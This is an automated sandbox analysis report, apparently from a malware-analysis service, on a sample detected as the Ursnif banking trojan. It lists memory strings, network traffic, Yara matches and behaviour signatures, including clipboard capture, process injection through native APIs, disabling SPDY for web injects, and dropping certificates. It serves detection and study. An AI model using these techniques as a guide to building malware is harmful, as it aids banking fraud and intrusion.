Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xNzD?ver=aee5&quot;
Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=77c4&quot;
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1blRDQ?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bmc4S?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=j
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001E.00000003.477391818.000000000E9DF000.00000004.00000040.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aWtIw.img?h=16&w=16
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ardZ3.img?h=16&w=16
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A81644 memcpy,memset,GetModuleHandleA,GetProcAddress,GetClipboardData,CloseHandle,FindCloseChangeNotification,CloseHandle,GetLastError,HeapFree, 1_2_04A81644
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.511370444.0000000000C2B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Drops certificate files (DER)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\183C.bin\Root.pfx Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\183C.bin\AuthRoot.pfx Jump to dropped file

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A864BF NtMapViewOfSection, 1_2_04A864BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A84093 GetProcAddress,NtCreateSection,memset, 1_2_04A84093
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A89E28 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_04A89E28
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8B2CD NtQueryVirtualMemory, 1_2_04A8B2CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493029D NtProtectVirtualMemory, 1_2_0493029D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C NtAllocateVirtualMemory, 1_2_0493009C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930066 NtAllocateVirtualMemory, 1_2_04930066
Source: C:\Windows\System32\control.exe Code function: 31_2_006B88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 31_2_006B88E0
Source: C:\Windows\System32\control.exe Code function: 31_2_006B1920 NtReadVirtualMemory, 31_2_006B1920
Source: C:\Windows\System32\control.exe Code function: 31_2_006A6104 NtQueryInformationProcess, 31_2_006A6104
Source: C:\Windows\System32\control.exe Code function: 31_2_006A91C0 NtQueryInformationProcess, 31_2_006A91C0
Source: C:\Windows\System32\control.exe Code function: 31_2_006BA9D8 NtWriteVirtualMemory, 31_2_006BA9D8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BDE98 NtAllocateVirtualMemory, 31_2_006BDE98
Source: C:\Windows\System32\control.exe Code function: 31_2_006BD748 NtMapViewOfSection, 31_2_006BD748
Source: C:\Windows\System32\control.exe Code function: 31_2_006B7B34 NtCreateSection, 31_2_006B7B34
Source: C:\Windows\System32\control.exe Code function: 31_2_006BEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 31_2_006BEB10
Source: C:\Windows\System32\control.exe Code function: 31_2_006B67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 31_2_006B67C8
Source: C:\Windows\System32\control.exe Code function: 31_2_006D900A NtProtectVirtualMemory,NtProtectVirtualMemory, 31_2_006D900A
Source: C:\Windows\System32\control.exe Code function: 31_2_006D936C NtProtectVirtualMemory, 31_2_006D936C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC91C0 NtQueryInformationProcess, 34_2_0000024E31FC91C0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_0000024E31FD88E0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FF900A NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_0000024E31FF900A
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8B0AC 1_2_04A8B0AC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A88534 1_2_04A88534
Source: C:\Windows\System32\control.exe Code function: 31_2_006B2A04 31_2_006B2A04
Source: C:\Windows\System32\control.exe Code function: 31_2_006A932C 31_2_006A932C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B67C8 31_2_006B67C8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BF06C 31_2_006BF06C
Source: C:\Windows\System32\control.exe Code function: 31_2_006BCC1C 31_2_006BCC1C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B64DC 31_2_006B64DC
Source: C:\Windows\System32\control.exe Code function: 31_2_006BC8A8 31_2_006BC8A8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BCC80 31_2_006BCC80
Source: C:\Windows\System32\control.exe Code function: 31_2_006A3498 31_2_006A3498
Source: C:\Windows\System32\control.exe Code function: 31_2_006B909C 31_2_006B909C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B096B 31_2_006B096B
Source: C:\Windows\System32\control.exe Code function: 31_2_006C117C 31_2_006C117C
Source: C:\Windows\System32\control.exe Code function: 31_2_006C654C 31_2_006C654C
Source: C:\Windows\System32\control.exe Code function: 31_2_006A8D2C 31_2_006A8D2C
Source: C:\Windows\System32\control.exe Code function: 31_2_006B051C 31_2_006B051C
Source: C:\Windows\System32\control.exe Code function: 31_2_006AFDD8 31_2_006AFDD8
Source: C:\Windows\System32\control.exe Code function: 31_2_006C31A4 31_2_006C31A4
Source: C:\Windows\System32\control.exe Code function: 31_2_006AA1A0 31_2_006AA1A0
Source: C:\Windows\System32\control.exe Code function: 31_2_006B4670 31_2_006B4670
Source: C:\Windows\System32\control.exe Code function: 31_2_006B2648 31_2_006B2648
Source: C:\Windows\System32\control.exe Code function: 31_2_006A964C 31_2_006A964C
Source: C:\Windows\System32\control.exe Code function: 31_2_006C7228 31_2_006C7228
Source: C:\Windows\System32\control.exe Code function: 31_2_006BC224 31_2_006BC224
Source: C:\Windows\System32\control.exe Code function: 31_2_006B0EC4 31_2_006B0EC4
Source: C:\Windows\System32\control.exe Code function: 31_2_006C7EDC 31_2_006C7EDC
Source: C:\Windows\System32\control.exe Code function: 31_2_006A7ED8 31_2_006A7ED8
Source: C:\Windows\System32\control.exe Code function: 31_2_006A4AA0 31_2_006A4AA0
Source: C:\Windows\System32\control.exe Code function: 31_2_006AA6A4 31_2_006AA6A4
Source: C:\Windows\System32\control.exe Code function: 31_2_006AB2A4 31_2_006AB2A4
Source: C:\Windows\System32\control.exe Code function: 31_2_006C5A88 31_2_006C5A88
Source: C:\Windows\System32\control.exe Code function: 31_2_006B3A9C 31_2_006B3A9C
Source: C:\Windows\System32\control.exe Code function: 31_2_006A5B40 31_2_006A5B40
Source: C:\Windows\System32\control.exe Code function: 31_2_006C6BDC 31_2_006C6BDC
Source: C:\Windows\System32\control.exe Code function: 31_2_006BF7D4 31_2_006BF7D4
Source: C:\Windows\System32\control.exe Code function: 31_2_006C4FA8 31_2_006C4FA8
Source: C:\Windows\System32\control.exe Code function: 31_2_006A6380 31_2_006A6380
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD2A04 34_2_0000024E31FD2A04
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC932C 34_2_0000024E31FC932C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE5A88 34_2_0000024E31FE5A88
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD4670 34_2_0000024E31FD4670
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC964C 34_2_0000024E31FC964C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD2648 34_2_0000024E31FD2648
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE7228 34_2_0000024E31FE7228
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FDC224 34_2_0000024E31FDC224
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FCFDD8 34_2_0000024E31FCFDD8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE31A4 34_2_0000024E31FE31A4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FCA1A0 34_2_0000024E31FCA1A0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE117C 34_2_0000024E31FE117C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD096B 34_2_0000024E31FD096B
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE654C 34_2_0000024E31FE654C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC8D2C 34_2_0000024E31FC8D2C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD051C 34_2_0000024E31FD051C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD64DC 34_2_0000024E31FD64DC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FDC8A8 34_2_0000024E31FDC8A8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD909C 34_2_0000024E31FD909C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC3498 34_2_0000024E31FC3498
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FDCC80 34_2_0000024E31FDCC80
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FDF06C 34_2_0000024E31FDF06C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FDCC1C 34_2_0000024E31FDCC1C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FE6BDC 34_2_0000024E31FE6BDC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FDF7D4 34_2_0000024E31FDF7D4
